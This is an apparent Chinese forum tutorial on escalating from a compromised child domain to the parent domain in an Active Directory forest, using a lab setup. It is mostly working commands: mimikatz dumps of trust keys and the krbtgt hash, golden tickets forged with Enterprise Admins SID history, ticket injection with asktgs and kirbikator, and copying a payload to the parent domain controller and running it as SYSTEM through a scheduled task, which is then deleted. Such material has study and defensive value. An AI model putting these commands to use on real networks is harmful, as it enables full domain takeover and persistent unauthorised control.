论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
朋友圈
看朋友圈动态,了解ToB世界。
ToB门户
了解全球最新的ToB事件
博客
Blog
排行榜
Ranklist
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
导读
Guide
相册
Album
记录
Doing
应用中心
搜索
本版
文章
帖子
ToB圈子
用户
免费入驻
产品入驻
解决方案入驻
公司入驻
案例入驻
登录
·
注册
账号登录
立即注册
找回密码
用户名
Email
自动登录
找回密码
密码
登录
立即注册
首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
圈子
SAAS
qidao123.com技术社区-IT企服评测·应用市场
»
论坛
›
安全
›
网络安全
›
跨域攻击的方法介绍
跨域攻击的方法介绍
万有斥力
论坛元老
|
2023-6-24 23:47:49
|
显示全部楼层
|
阅读模式
楼主
主题
1759
|
帖子
1759
|
积分
5277
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要
登录
才可以下载或查看,没有账号?
立即注册
x
跨域攻击的方法介绍
目录
跨域攻击的方法介绍
一、内网中的域林
二、跨域攻击方法
三、获取域信息
四、利用域信任密钥跨域
五、利用krbtgt哈希值跨域
一、内网中的域林
很多大型企业都拥有自己的内网,一般通过域林进行共享资源。根据不同职能区分的部门,从逻辑上以主域和子域进行区分,以方便统一管理。在物理层,通常使用防火墙将各个子公司及各个部门划分为不同的区域。
二、跨域攻击方法
1、常规渗透方法(利用web漏洞)
2、哈希传递票据攻击
3、利用域信任关系
三、获取域信息
在域中,Enterprise Admins组(出现在林中的根域中)的成员具有对目录林中所有域的完全控制权限。在默认情况下,该组包含林中所有域控制器上具有Administrators权限的成员。
1、查看当前域中计算机的权限
whoami /all
复制代码
2、查看域信任关系
nltest /domain_trusts
复制代码
3、使用LG工具获取域信息
(1)获取当前域中的用户组
LG.exe 域名\.
复制代码
(2)获取远程机器的本地用户组
LG.exe \\计算机名 -lu
复制代码
(3)获取远程系统中的用户SID
LG.exe \\计算机名 -lu -sidsout
复制代码
四、利用域信任密钥跨域
1、实验环境
IP地址所属域域中地位机器名当前登录用户192.168.142.10candada.comcandada的域控DC1candada\administrator192.168.142.20test.candada.comtest子域的域控DC2test\administrator192.168.142.32test.candada.comtest子域的机器win10-2test\can已经控制住DC2和win10-2,目标是进一步控制DC1。
2、实验步骤
(1)使用mimikatz获取当前域的SID、父域的SID、子域域管的NTLM信任密钥。
mimikatz lsadump::trust /patch
复制代码
mimikatz lsadump::lsa /patch /user:candada$
复制代码
(2)在普通的域内用户中创建创建高权限票据
mimikatz kerberos::golden /domain:子域 /sid:子域SID /sids:父域-519 /rc4:信任密钥 /user:任意用户 /service:krbtgt /target:父域 /ticket:subdc_administrator.kirbi
复制代码
mimikatz kerberos::golden /domain:test.candada.com /sid:S-1-5-21-1283977433-887585873-3504403688 /sids:S-1-5-21-1441271535-139503665-1739510498-519 /rc4:85ebc8bf10bf4e04c20f4b3ce0a553af /user:administrator /service:krbtgt /target:candada.com /ticket:administrator.kirbi
复制代码
(3)上传asktgs.exe和kirbikator.exe工具,asktgs.exe伪造票据,kirbikator.exe注入票据
创建CIFS服务的票据和host服务票据
shell asktgs.exe administrator.kirbi cifs/DC1.candada.com
复制代码
shell asktgs.exe administrator.kirbi host/DC1.candada.com
复制代码
将票据注入内存
shell kirbikator.exe lsa cifs.DC1.candada.com.kirbi
复制代码
复制文件的操作
shell copy can1.exe \\dc1.candada.com\c$
复制代码
shell dir \\dc1.candada.com\c$
复制代码
(4)进行创建计划任务
shell schtasks /create /s dc1.candada.com /tn test /sc onstart /tr c:\can1.exe /ru system /f
复制代码
(5)执行计划任务
schtasks /run /s dc1.candada.com /i /tn "test"
复制代码
(6)删除计划任务
shell schtasks /delete /s dc1.candada.com /tn "test" /f
复制代码
五、利用krbtgt哈希值跨域
1、实验环境
IP地址所属域域中地位机器名当前登录用户192.168.142.10candada.comcandada的域控DC1candada\administrator192.168.142.20test.candada.comtest子域的域控DC2test\administrator192.168.142.32test.candada.comtest子域的机器win10-2test\can已经控制住DC2和win10-2,目标是进一步控制DC1。
2、实验步骤
(1)获取Krbtgt散列
mimikatz lsadump::lsa /patch /user:krbtgt
复制代码
(2)获取当前域的SID、父域的SID
mimikatz lsadump::trust /patch
复制代码
(3)构造并注入黄金票据
Kerberos::golden /user:administrator /domain:当前域名 /sid:当前SID /sids:目标域SID-519 /krbtgt:krbtgt散列 /ptt
复制代码
mimikatz Kerberos::golden /user:administrator /domain:test.candada.com /sid:S-1-5-21-1283977433-887585873-3504403688 /sids:S-1-5-21-1441271535-139503665-1739510498-519 /krbtgt:dd30df5d4360179f04471b39ed515274 /ptt
复制代码
(4)后续可利用计划任务或者服务进行上线
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
回复
使用道具
举报
0 个回复
倒序浏览
返回列表
快速回复
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
or
立即注册
本版积分规则
发表回复
回帖并转播
回帖后跳转到最后一页
发新帖
回复
万有斥力
论坛元老
这个人很懒什么都没写!
楼主热帖
MyBatis-Plus入门教程及基本API使用案 ...
深度理解 C# 中的 for 和 foreach ...
OpenJDK和OracleJDK的区别说明
几个函数的使用例子:更新VBRK-XBLNR, ...
EFCore 动态拼接查询条件(表达式树方式 ...
阿里巴巴Java开发手册(全册四版) ...
.net 发邮件的小工具,包含json,环境 ...
Excel 制作可视化看板的思路及操作 ...
2022年混过的那些SAP项目
MySQL分区表对NULL值的处理
标签云
渠道
国产数据库
集成商
AI
运维
CIO
存储
服务器
浏览过的版块
人工智能
边缘计算
快速回复
返回顶部
返回列表